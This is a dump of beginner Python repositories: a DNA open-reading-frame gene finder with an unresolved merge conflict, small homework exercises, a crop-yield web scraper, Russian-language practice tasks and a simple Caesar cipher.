"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 2 11:24:42 2014\n\n@author: Deniz Celik\n\nSkeleton provided by Paul Ruvolo\n\"\"\"\n\n# you may find it useful to import these variables (although you are not required to use them)\nfrom amino_acids import aa, codons\nfrom random import shuffle\nfrom load import *\n\ndef collapse(L):\n \"\"\" Converts a list of strings to a string by concatenating all elements of the list \"\"\"\n output = \"\"\n for s in L:\n output = output + s\n return output\n\ndef coding_strand_to_AA(dna):\n \"\"\" Computes the Protein encoded by a sequence of DNA. This function\n does not check for start and stop codons (it assumes that the input\n DNA sequence represents an protein coding region).\n \n dna: a DNA sequence represented as a string\n returns: a string containing the sequence of amino acids encoded by the\n the input DNA fragment\n \"\"\"\n dnainp = dna\n protein = ''\n if len(dnainp)<3:\n return \"ERROR: The provided fragment is too short to contain any codons.\"\n# elif len(dnainp)%3 is not 0:\n# print \"Warning: The provided DNA fragment does not contain an integer number of codons. Excess bases were leftout.\"\n while len(dnainp) >=3:\n cod = dnainp[:3]\n for i in codons:\n for j in i:\n if j == cod:\n protein = protein + aa[codons.index(i)]\n dnainp = dnainp[3:]\n return protein\n \ndef coding_strand_to_AA_unit_tests():\n \"\"\" Unit tests for the coding_strand_to_AA function \"\"\"\n print \"input: GTTGACAGTACGTACAGGGAA, \"+\"output: \"+coding_strand_to_AA(\"GTTGACAGTACGTACAGGGAA\")+\", actual output: VDSTYRE\"\n print \"input: TTATTGCTTATTATCATG, \"+\"output: \"+coding_strand_to_AA(\"TTATTGCTTATTATCATG\")+\", actual output: LLLIIM\"\n print \"input: TTTTTAATTATGGTTTCTCCTACTGCTTATTAACATCAAAATAAAGATGAATGTTGGCGTGGT, \"+\"output: \"+coding_strand_to_AA(\"TTTTTAATTATGGTTTCTCCTACTGCTTATTAACATCAAAATAAAGATGAATGTTGGCGTGGT\")+\", actual output: FLIMVSPTAY|HQNKDECWRG\"\n print \"input: TT, \" + \"output: \"+coding_strand_to_AA(\"TT\")+\", actual output: ERROR: The provided fragment is too short to contain any codons.\"\n\ndef get_reverse_complement(dna):\n \"\"\" Computes the reverse complementary sequence of DNA for the specfied DNA\n sequence\n \n dna: a DNA sequence represented as a string\n returns: the reverse complementary DNA sequence represented as a string\n \"\"\"\n \n dna = dna.replace('T','N')\n dna = dna.replace('A','T')\n dna = dna.replace('N','A')\n dna = dna.replace('C','N')\n dna = dna.replace('G','C')\n dna = dna.replace('N','G')\n dna = dna[::-1]\n return dna\n \ndef get_reverse_complement_unit_tests():\n \"\"\" Unit tests for the get_complement function \"\"\"\n print \"input: GTTGACAGTACGTACAGGGAA, \"+\"output: \"+ get_reverse_complement(\"GTTGACAGTACGTACAGGGAA\") +\", actual output: AAGGGACATGCATGACAGTTG\" \n print \"input: TTATTGCTTATTATCATG, \"+\"output: \"+get_reverse_complement(\"TTATTGCTTATTATCATG\")+\", actual output: GTACTATTATTCGTTATT\"\n print \"input: ATC, \"+\"output: \"+get_reverse_complement(\"ATC\")+\", actual output: GAT\"\n print \"input: CTA, \"+\"output: \"+get_reverse_complement(\"CTA\")+\", actual output: TAG\"\n\ndef rest_of_ORF(dna):\n \"\"\" Takes a DNA sequence that is assumed to begin with a start codon and returns\n the sequence up to but not including the first in frame stop codon. If there\n is no in frame stop codon, returns the whole string.\n \n dna: a DNA sequence\n returns: the open reading frame represented as a string\n \"\"\"\n \n if dna[:3]== \"TAG\" or dna[:3]==\"TAA\" or dna[:3]==\"TGA\" or len(dna)<3:\n return \"\"\n if len(dna)<=3:\n return dna\n return dna[:3]+rest_of_ORF(dna[3:])\n\ndef rest_of_ORF_unit_tests():\n \"\"\" Unit tests for the rest_of_ORF function \"\"\"\n print \"input: CTA, \"+\"output: \"+rest_of_ORF(\"CTA\")+\", actual output: CTA\"\n print \"input: GTCACTTAGGGTTTT, \"+\"output: \"+rest_of_ORF(\"GTCACTTAGGGTTTT\")+\", actual output: GTCACT\"\n print \"input: AAATTTTATAATGGGTGAAGTTAG, \"+\"output: \"+rest_of_ORF(\"AAATTTTATAATGGGTGAAGTTAG\")+\", actual output: AAATTTTATAATGGG\"\n print \"input: TATATGGAGGATAATAGTTGATAATAG, \"+\"output: \"+rest_of_ORF(\"TATATGGAGGATAATAGTTGATAATAG\")+\", actual output: TATATGGAGGATAATAGT\"\n\ndef find_all_ORFs_oneframe(dna):\n \"\"\" Finds all non-nested open reading frames in the given DNA sequence and returns\n them as a list. This function should only find ORFs that are in the default\n frame of the sequence (i.e. they start on indices that are multiples of 3).\n By non-nested we mean that if an ORF occurs entirely within\n another ORF, it should not be included in the returned list of ORFs.\n \n dna: a DNA sequence\n returns: a list of non-nested ORFs\n \"\"\"\n<<<<<<< HEAD\n dnainp = dna\n orfs = []\n if len(dnainp)<3:\n orfs.append(dna)\n while len(dnainp)>=3:\n if dnainp[:3]=='ATG':\n orfs.append(rest_of_ORF(dnainp))\n minuslen = len(rest_of_ORF(dnainp))+3\n dnainp = dnainp[minuslen:]\n else:\n dnainp = dnainp[3:]\n y = [s for s in orfs if s!='']\n return y\n \n \n=======\n \n # YOUR IMPLEMENTATION HERE \n \ndef find_all_ORFs_oneframe_unit_tests():\n \"\"\" Unit tests for the find_all_ORFs_oneframe function \"\"\"\n\n # YOUR IMPLEMENTATION HERE\n\n>>>>>>> upstream/master\ndef find_all_ORFs(dna):\n \"\"\" Finds all non-nested open reading frames in the given DNA sequence in all 3\n possible frames and returns them as a list. By non-nested we mean that if an\n ORF occurs entirely within another ORF and they are both in the same frame,\n it should not be included in the returned list of ORFs.\n \n dna: a DNA sequence\n returns: a list of non-nested ORFs\n \"\"\"\n ans = find_all_ORFs_oneframe(dna)\n ans.extend(find_all_ORFs_oneframe(dna[1:]))\n ans.extend(find_all_ORFs_oneframe(dna[2:]))\n return ans\n \n \ndef find_all_ORFs_unit_tests():\n \"\"\" Unit tests for the find_all_ORFs function \"\"\"\n \n print \"input: ATGCTA, \"+\"output: \"+ \",\".join(find_all_ORFs(\"ATGCTA\"))+\", actual output: CTA\"\n print \"input: GTCACTTATGGGTTT, \"+\"output: \"+\",\".join(find_all_ORFs(\"ATGGATGCTTAGGGATGTTT\"))+\", actual output: GTCACT,GGTTTT,TCACTTAGGGTTTT,CACTTAGGGTTTT\"\n print \"input: AAATTTTATAATGGGTGAAGTTAG, \"+\"output: \"+\",\".join(find_all_ORFs(\"AAATTTTATAATGGGTGAAGTTAG\"))+\", actual output: ATGGGTGAAGTT\"\n print \"input: TATATGGAGGATAATAGTTGATAATAG, \"+\"output: \"+ \",\".join(find_all_ORFs(\"TATATGGAGGATAATAGTTGATAATAG\"))+\", actual output: ATGGAGGATAATAGT\" \n\ndef find_all_ORFs_both_strands(dna):\n \"\"\" Finds all non-nested open reading frames in the given DNA sequence on both\n strands.\n \n dna: a DNA sequence\n returns: a list of non-nested ORFs\n \"\"\"\n return find_all_ORFs(dna) + (find_all_ORFs(get_reverse_complement(dna)))\n \n \ndef find_all_ORFs_both_strands_unit_tests():\n \"\"\" Unit tests for the find_all_ORFs_both_strands function \"\"\"\n print \"input: CTA, \"+\"output: \"+ \",\".join(find_all_ORFs_both_strands(\"CTA\"))+\", actual output: CTA,TA,A,AG,G\"\n print \"input: GTCACTTAGGGTTTT, \"+\"output: \"+\",\".join(find_all_ORFs_both_strands(\"GTCACTTAGGGTTTT\"))+\", actual output: GTCACT,GGTTTT,TCACTTAGGGTTTT,CACTTAGGGTTTT,AAAACCCTAAGTGAC,AAACCC,GTGAC,AACCCTAAG\"\n print \"input: AAATTTTATAATGGGTGAAGTTAG, \"+\"output: \"+\",\".join(find_all_ORFs_both_strands(\"AAATTTTATAATGGGTGAAGTTAG\"))+\", actual output: AAATTTTATAATGGG,AGT,AATTTTATAATGGGTGAAGTTAG,ATTTTA,TGGGTGAAGTTAG,CTAACTTCACCCATTATAAAATTT,CTTCACCCATTA,AATTT,AACTTCACCCATTATAAAATTT\"\n print \"input: TATATGGAGGATAATAGTTGATAATAG, \"+\"output: \"+ \",\".join(find_all_ORFs_both_strands(\"TATATGGAGGATAATAGTTGATAATAG\"))+\", actual output: TATATGGAGGATAATAGT,ATATGGAGGATAATAGTTGATAATAG,TATGGAGGA,TTGATAATAG,CTATTATCAACTATTATCCTCCATATA,TATTATCAACTATTATCCTCCATATA,ATTATCAACTATTATCCTCCATATA\" \n\n\ndef longest_ORF(dna):\n \"\"\" Finds the longest ORF on both strands of the specified DNA and returns it\n as a string\"\"\"\n orfs = find_all_ORFs_both_strands(dna)\n maxorf =orfs[1];\n for s in orfs:\n if len(s)>len(maxorf):\n maxorf=s\n return maxorf\n\ndef longest_ORF_unit_tests():\n \"\"\" Unit tests for the longest_ORF function \"\"\"\n\n # YOUR IMPLEMENTATION HERE\n\ndef longest_ORF_noncoding(dna, num_trials):\n \"\"\" Computes the maximum length of the longest ORF over num_trials shuffles\n of the specfied DNA sequence\n \n dna: a DNA sequence\n num_trials: the number of random shuffles\n returns: the maximum length longest ORF \"\"\"\n dnal = list(dna)\n maxorf = 0\n for i in range(num_trials):\n shuffle(dnal)\n orf = len(longest_ORF(collapse(dnal)))\n if maxorf<orf:\n maxorf = orf\n return maxorf \n\ndef gene_finder(dna, threshold):\n \"\"\" Returns the amino acid sequences coded by all genes that have an ORF\n larger than the specified threshold.\n \n dna: a DNA sequence\n threshold: the minimum length of the ORF for it to be considered a valid\n gene.\n returns: a list of all amino acid sequences whose ORFs meet the minimum\n length specified.\n \"\"\"\n orfs = find_all_ORFs_both_strands(dna)\n orfs = [i for i in orfs if len(i)>threshold]\n orfs = [coding_strand_to_AA(i) for i in orfs]\n return orfs\n \nsampledna = load_seq(\"./data/X73525.fa\")\nsamplethresh = longest_ORF_noncoding(sampledna,1500)\nprint samplethresh\nprint gene_finder(sampledna, samplethresh)\n"
},
{
"alpha_fraction": 0.44999998807907104,
"alphanum_fraction": 0.5142857432365417,
"avg_line_length": 15.84000015258789,
"blob_id": "ca62c3589b11de7a3a22fde2dbc8a51eb561c5b9",
"content_id": "70a875e22b576a6328e8a8f85546a6bd53a5bcfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 25,
"path": "/fib.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 13 15:01:04 2014\n\n@author: dcelik\n\"\"\"\n\ndef fib(n):\n if n==0 or n==1:\n return n\n return fib(n-1)+fib(n-2)\n \nprint [fib(i) for i in range(1,10)]\n\nfibdict={}\ndef fibonacci(n,d={}):\n if n==0 or n==1:\n return n\n elif n in d:\n return d[n]\n else:\n x = fibonacci(n-2)+fibonacci(n-1)\n d[n]=x\n return x\nprint fibonacci(100)"
},
{
"alpha_fraction": 0.5111402273178101,
"alphanum_fraction": 0.60550457239151,
"avg_line_length": 22.875,
"blob_id": "9b17a7efc68d8401fe7d51b3e103e2baf480199a",
"content_id": "8f42cd2202336dd45f648b36739a430439f3900d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 763,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 32,
"path": "/quizzes/quiz2.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 13 13:38:17 2014\n\n@author: dcelik\n\"\"\"\ndef filter_out_negative_numbers(nums):\n newl = []\n for i in nums:\n if i>=0:\n newl.append(i)\n return newl\n \nprint filter_out_negative_numbers([-2,5,10,-100,5])\nprint filter_out_negative_numbers([-1,1,2,-2,-100,50,70,20,-1,-8,-9])\n\ndef filter_out_negative_numbers_SHORT(nums):\n return [i for i in nums if i>=0]\n\nprint filter_out_negative_numbers_SHORT([-2,5,10,-100,5])\nprint filter_out_negative_numbers_SHORT([-1,1,2,-2,-100,50,70,20,-1,-8,-9])\n\nprint range(0,1)\n\ndef sum_of_squares(n):\n if n==0:\n return 0\n return (n**2) + sum_of_squares(n-1) \n \nnlist = [i for i in range(0,30)] \ny = [sum_of_squares(i) for i in nlist]\nprint y"
},
{
"alpha_fraction": 0.5749797224998474,
"alphanum_fraction": 0.6025398373603821,
"avg_line_length": 32.297298431396484,
"blob_id": "17bbf74999d9dc63732445712bdc517ff0a0d28f",
"content_id": "31e3fba0cdb5faf13fefdff38e4a4381edf032eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3701,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 111,
"path": "/hw4/random_art.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 11:34:57 2014\n\n@author: pruvolo\n\"\"\"\n\n# you do not have to use these particular modules, but they may help\nfrom random import randint\nimport Image\nimport math\n\ndef build_random_function(min_depth, max_depth):\n \"\"\" Creates and returns a random function, with a recursive depth betwene min_depth \n and max_depth. It returns a nested list filled with strings representing the\n desired functions.\n \"\"\"\n num = randint(1,5)\n if min_depth<=0 and max_depth>0:\n if randint(0,10)>5:\n max_depth=0\n if max_depth==0:\n num = randint(6,7) \n if num==1:\n return [\"prod\",build_random_function(min_depth-1,max_depth-1),build_random_function(min_depth-1,max_depth-1)]\n if num==2:\n return [\"cos_pi\",build_random_function(min_depth-1,max_depth-1)]\n if num==3:\n return [\"sin_pi\",build_random_function(min_depth-1,max_depth-1)]\n if num==4:\n return [\"ave\",build_random_function(min_depth-1,max_depth-1),build_random_function(min_depth-1,max_depth-1)]\n if num==5:\n return [\"sin_xy\",build_random_function(min_depth-1,max_depth-1),build_random_function(min_depth-1,max_depth-1)]\n if num==6:\n return [\"x\"]\n if num==7:\n return [\"y\"]\n \ndef prod(a,b):\n return a*b\n\ndef cos_pi(a):\n return math.cos(math.pi*a)\n \ndef sin_pi(a):\n return math.sin(math.pi*a)\n \ndef sin_xy(a,b):\n return math.sin(math.pi*a*b*randint(1,10))\n\ndef x(a,b):\n return a\n\ndef y(a,b):\n return b\n \ndef ave(a,b):\n return (a+b)/2.0\n\ndef evaluate_random_function(f, x, y):\n \"\"\" Takes a function f and translates it into a series of recursive method calls\n which are then evaluated with the given x and y values.\n \"\"\"\n str = f[0]\n if str=='ave':\n return ave(evaluate_random_function(f[1],x,y),evaluate_random_function(f[2],x,y))\n if str=='prod':\n return prod(evaluate_random_function(f[1],x,y),evaluate_random_function(f[2],x,y))\n if str=='sin_xy':\n return sin_xy(evaluate_random_function(f[1],x,y),evaluate_random_function(f[2],x,y))\n if str=='cos_pi':\n return cos_pi(evaluate_random_function(f[1],x,y))\n if str=='sin_pi':\n return sin_pi(evaluate_random_function(f[1],x,y))\n if str=='x':\n return x\n if str=='y':\n return y\n\n \n \ndef remap_interval(val, input_interval_start, input_interval_end, output_interval_start, output_interval_end):\n \"\"\" Maps the input value that is in the interval [input_interval_start, input_interval_end]\n to the output interval [output_interval_start, output_interval_end]. The mapping\n is an affine one (i.e. output = input*c + b).\n \"\"\"\n return(output_interval_end-output_interval_start)*float((val-input_interval_start))/float((input_interval_end-input_interval_start))+output_interval_start\n\ndef main():\n red = build_random_function(4,17)\n green = build_random_function(3,18)\n blue = build_random_function(2,20)\n im = Image.new(\"RGB\",(350,350))\n horz,vert = im.size\n pixels = im.load()\n for i in xrange(horz):\n x = remap_interval(i,0,horz,-1,1)\n for j in xrange(vert):\n y = remap_interval(j,0,horz,-1,1)\n r = evaluate_random_function(red,x,y)\n g = evaluate_random_function(green,x,y)\n b = evaluate_random_function(blue,x,y)\n r = int(remap_interval(r,-1,1,0,255))\n g = int(remap_interval(g,-1,1,0,255))\n b = int(remap_interval(b,-1,1,0,255))\n pixels[i,j] = (r,g,b)\n \n im.save(\"Deniz9\",\"png\")\n \nif __name__==\"__main__\":\n main() "
},
{
"alpha_fraction": 0.5602940917015076,
"alphanum_fraction": 0.5852941274642944,
"avg_line_length": 26.040000915527344,
"blob_id": "c23da378d2603c5bb78c89c81a08ebd3188cc3f7",
"content_id": "f027a7b80c49b84abc193501f8d54680c6814310",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 680,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 25,
"path": "/hw2/fermat.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- co<ding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 3 03:23:32 2014\n\n@author: dcelik\n\"\"\"\n\ndef fermat(a,b,c,n):\n part1 = a**n + b**n\n part2 = c**n\n if n<=2:\n print \"n must be greater than 2!\"\n elif a**n + b**n == c**n:\n print \"Holy Smokes, Fermat was Wrong\"\n else:\n print \"No, that doesn't work.\"\n\ndef fermatcheck():\n print \"Input a,b,c, and n to check if they satisfy fermats last equation!\"\n ainp = int(raw_input(\"Please input a\\n\"))\n binp = int(raw_input(\"Please input b\\n\"))\n cinp = int(raw_input(\"Please input c\\n\"))\n ninp = int(raw_input(\"Please input an n greater than 2\\n\"))\n fermat(ainp,binp,cinp,ninp)\nfermatcheck()\n "
},
{
"alpha_fraction": 0.5091575384140015,
"alphanum_fraction": 0.5641025900840759,
"avg_line_length": 18.571428298950195,
"blob_id": "fa7d953e1139ac74d899cf7450a2cdf9c93ab399",
"content_id": "729652a355a6adbd41aa7c31aa4756bb0ca90bbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 14,
"path": "/hw2/compare.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 3 03:57:59 2014\n\n@author: dcelik\n\"\"\"\n\ndef compare(x,y):\n if x>y:\n return 1\n if x==y:\n return 0\n return -1\nprint \"Compare returned \"+str(compare(raw_input(\"Give me an X!\\n\"),raw_input(\"Give me a Y!\\n\")))"
},
{
"alpha_fraction": 0.38743454217910767,
"alphanum_fraction": 0.4659685790538788,
"avg_line_length": 15,
"blob_id": "3802e94ff309bd30d38314a6ad85023a2e9f1fec",
"content_id": "f4d0def0f5d491c0c0bd251cf74314eb73c25dfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 191,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 12,
"path": "/hw2/grid.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 30 15:05:09 2014\n\n@author: dcelik\n\"\"\"\n\ndef grid():\n plus = '+----+----+\\n'\n vert = '| | |\\n'\n print (plus+(vert*4))*2+plus\ngrid()"
}
] | 8 |
glamboyosa/historical-yield-data
|
https://github.com/glamboyosa/historical-yield-data
|
4249db822e66ba4c60bf06ce5debbd8605c97cb5
|
47b41a70f658140f16e2f24c2c3e09ea2a4e40ff
|
033700710d7cf8bfccdb9b2e3a753c7e8b5f749e
|
refs/heads/master
| 2021-02-27T06:58:32.558497 | 2020-03-07T07:49:43 | 2020-03-07T07:49:43 | 245,590,362 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8217821717262268,
"alphanum_fraction": 0.8217821717262268,
"avg_line_length": 32.66666793823242,
"blob_id": "6d6f65cdd50953919b130de7bd1ffa634df8a9c1",
"content_id": "c6c379bd1b34f2f9b4da5288910b0fb9e6adb6ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 3,
"path": "/readme.md",
"repo_name": "glamboyosa/historical-yield-data",
"src_encoding": "UTF-8",
"text": "# Historical Crop Yield Data\n\nweb scraper collecting historical crop yield for my final year project\n"
},
{
"alpha_fraction": 0.6557132005691528,
"alphanum_fraction": 0.6848394274711609,
"avg_line_length": 28.10869598388672,
"blob_id": "6a59d4fd83dd18115f31eea59495165c19685c99",
"content_id": "0e710552e7286a890d9bef3041578494e6e3bb08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1339,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 46,
"path": "/scraper.py",
"repo_name": "glamboyosa/historical-yield-data",
"src_encoding": "UTF-8",
"text": "import pandas\nfrom pandas import Series, DataFrame\nimport numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\nURLS = [\n 'http://www.factfish.com/statistic-country/nigeria/maize%2C%20total%2C%20%20production%20quantity'\n]\ndictionary = ''\nyear_name = []\nyear = []\nvalue_name = []\nvalue = []\nresults_3 = None\nfor url in URLS:\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n results = soup.find_all('th')\n results_3 = soup.find_all(\n 'table', class_='table table-striped table-bordered factfish-drill-down-data-table')[0].text.split()[slice(2, 115)]\n # print(results_3)\n year_name.append(results[0].text)\n value_name.append(results[1].text)\n\n # if resultest == None:\n # print('Okay this is how we will do itt')\n # print(year_name)\n # print(value_name)\n# print(results_3)\nyear = results_3[slice(0, 115, 2)][slice(1, 57)]\nprint(year_name)\nprint(len(year))\nvalue = results_3[slice(1, 115, 2)]\nprint(value_name)\nprint(len(value))\ndictionary = {\n year_name[0]: year,\n value_name[0]: value\n}\nprint(dictionary)\ndf = DataFrame(dictionary)\ndf.to_csv(r'C:\\Users\\Osa\\Documents\\Crop Yield\\maize-yield.csv',\n index=None, header=True)\nprint(dictionary)\nprint(DataFrame(dictionary))\nprint(pandas.read_csv(r'C:\\Users\\Osa\\Documents\\Crop Yield\\maize-yield.csv'))\n"
}
] | 2 |
Yevgen32/Python
|
https://github.com/Yevgen32/Python
|
fff8a7b2bb9b6bd35590801aa01a5aad7cc96d64
|
ac38c5c67dee66d35c89cad0e8debd180272239d
|
27a936ad9d28c27ee5b90f82df648c79e015e723
|
refs/heads/master
| 2021-04-27T21:01:29.772856 | 2018-03-05T16:48:31 | 2018-03-05T16:48:31 | 122,392,884 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7010309100151062,
"alphanum_fraction": 0.7139175534248352,
"avg_line_length": 24.866666793823242,
"blob_id": "5b474202a9e7b5a653ec5e78810487ec12d77438",
"content_id": "2fd3af4fa53f8e4e8748a20642383d76fcae89a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 587,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 15,
"path": "/Practic/Tasks/24.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит количество дней,\n# указывает процент скидки и вводит сумму. Рассчитать прибыль, если за каждый день сумма увеличивается на 3 $ и затем применяется скидка, то есть итоговая сумма\n# еще увеличивается на данное число процентов.\n\nday = int(input(\"day:\"))\n\nproz = int(input(\"proz:\"))\n\nsum = int(input(\"sum:\"))\n\npoh = day * 3\n\nprib = poh + poh * (proz / 100)\n\nprint(prib)\n"
},
{
"alpha_fraction": 0.4556961953639984,
"alphanum_fraction": 0.5189873576164246,
"avg_line_length": 12.166666984558105,
"blob_id": "ce195538b56758330f02230d39f451287cf7ebb5",
"content_id": "d5123a1b40757efc824a9205caefbd02cef602f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 199,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 12,
"path": "/Practic/Tasks/86.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Для данного n найти сумму 1+2+3+...+n. Например, для n=10 ответ равен 55.\n\nn = int(input(\"n:\"))\n\ni = 0\n\ng = 0\n\nwhile i < n:\n i +=1\n g +=i\n print(g)\n"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.5855130553245544,
"avg_line_length": 29.9375,
"blob_id": "99ea4d00afad079c93deb281e5e39294c1e398a5",
"content_id": "a0529fa1efd8c2179d4510fa9fdbd481023de684",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 675,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 16,
"path": "/Practic/Tasks/69.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит три числа - длины сторон треугольника. Найти площадь треугольника. Сделать проверку на существование треугольника (например, 1, 2, 3 - такого треугольника не существует). Проверить ответы можно здесь\n\nimport math\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\nc = int(input(\"c:\"))\n\nif a + b > c and a + c > b and b + c > a:\n p = (a + b + c) /2\n print(\"p:\",p*2)\n s = (p * ( p - a ) * ( p - b ) * ( p - c ))**0.5\n print(\"s:\",s)\n print(\"true\")\nelse:\n\tprint(\"false\")\n\n\n"
},
{
"alpha_fraction": 0.4672435224056244,
"alphanum_fraction": 0.5414091348648071,
"avg_line_length": 34.173912048339844,
"blob_id": "ef44ef7a03e88262c7e6252148db2208d1c56583",
"content_id": "85ef68730554ae812587e6c9bb93dff08dd2e5e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 895,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 23,
"path": "/Practic/Tasks/65.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "4#Дано четырехзначное число. Переставьте местами цифры так, чтобы сначала оказались цифры, меньшие пяти.\n\nvalue = int(input(\"Value:\"))\n\n\ndigit_1 = value // 1000\ndigit_2 = value // 100 % 10\ndigit_3 = value // 10 % 10\ndigit_4 = value % 10\n\n\nif digit_1 < 5:\n if digit_2 < 5:\n if digit_3 < 5:\n if digit_4 < 5:\n if digit_2 > digit_1 and digit_4 > digit_3:\n print(digit_1,digit_2,digit_3,digit_4)\n elif digit_2 > digit_1 and digit_3 > digit_4:\n print(digit_1,digit_2,digit_4,digit_3)\n elif digit_1 > digit_2 and digit_4 > digit_3:\n print(digit_2,digit_1,digit_3,digit_4)\n elif digit_1 > digit_2 and digit_3 > digit_4:\n print(digit_2,digit_1,digit_4,digit_3)\n"
},
{
"alpha_fraction": 0.5830815434455872,
"alphanum_fraction": 0.652567982673645,
"avg_line_length": 22.64285659790039,
"blob_id": "a56dfba9b85dba2b8726733e0fa92103c9754658",
"content_id": "9ad2c07cbbc6a21e3abd634b9e98b1566925e245",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 14,
"path": "/Practic/Tasks/64.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано четырехзначное число. Если оно читается слева направо и справа налево одинаково, то вывести yes, иначе no.\n\nvalue = int(input(\"Value:\"))\n\n\ndigit_1 = value // 1000\ndigit_2 = value // 100 % 10\ndigit_3 = value // 10 % 10\ndigit_4 = value % 10\n\nif digit_1 == digit_4 and digit_2 == digit_3:\n print(\"YES\")\nelse:\n print(\"NO\")\n"
},
{
"alpha_fraction": 0.4483568072319031,
"alphanum_fraction": 0.48122066259384155,
"avg_line_length": 22.61111068725586,
"blob_id": "7a103ac5e1bc94baf04d06c2021b035ea41845cd",
"content_id": "fe516a1bd144d354e28d446a97911e53b8a10dd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 426,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 18,
"path": "/Cryptology/Caesar_lab_1.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "arr1=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']\n\narr2=[]\nfor i in range(len(arr1)):\n arr2.append(arr1[i])\nnumber=int(input(\"Key:\"))\nfor i in range(number):\n arr2.append(arr2[0])\n arr2.remove(arr2[0])\n\nmsg = input(\"text:\")\n\nmsgc = \"\"\nfor i in msg:\n for j in range(len(arr1)):\n if i == arr1[j]:\n msgc += arr2[j]\nprint(\"Crypt:\", msgc)\n\n"
},
{
"alpha_fraction": 0.6990881562232971,
"alphanum_fraction": 0.6990881562232971,
"avg_line_length": 28.909090042114258,
"blob_id": "dcd32d49883c39c5fad0bb20062253f68486aa44",
"content_id": "744920d7b22813d0d3cbbcc57cd981545380f02b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 500,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 11,
"path": "/Practic/Tasks/70.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны целочисленные координаты трех вершин прямоугольника. стороны которого параллельны координатным осям. Найдите координаты его четвертой вершины (после проверки введенных данных на правильность).\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\nc = int(input(\"c:\"))\n\nif a == c:\n d = b\n print(a,b,c,d)\nelse:\n print(\"FALSE\")\n"
},
{
"alpha_fraction": 0.7049180269241333,
"alphanum_fraction": 0.7213114500045776,
"avg_line_length": 16.428571701049805,
"blob_id": "1b0fde91b09d6750c00d04bb9fbcd5ba2778d0fa",
"content_id": "7e0fd97994c2c28ad9ef60d86981139a93dc90e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 195,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 7,
"path": "/Practic/Tasks/29.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Поменяйте местами значения двух переменных, не используя дополнительных переменных.\n\na = 3\nb = 2\na,b = b,a\n\nprint (a, b)\n"
},
{
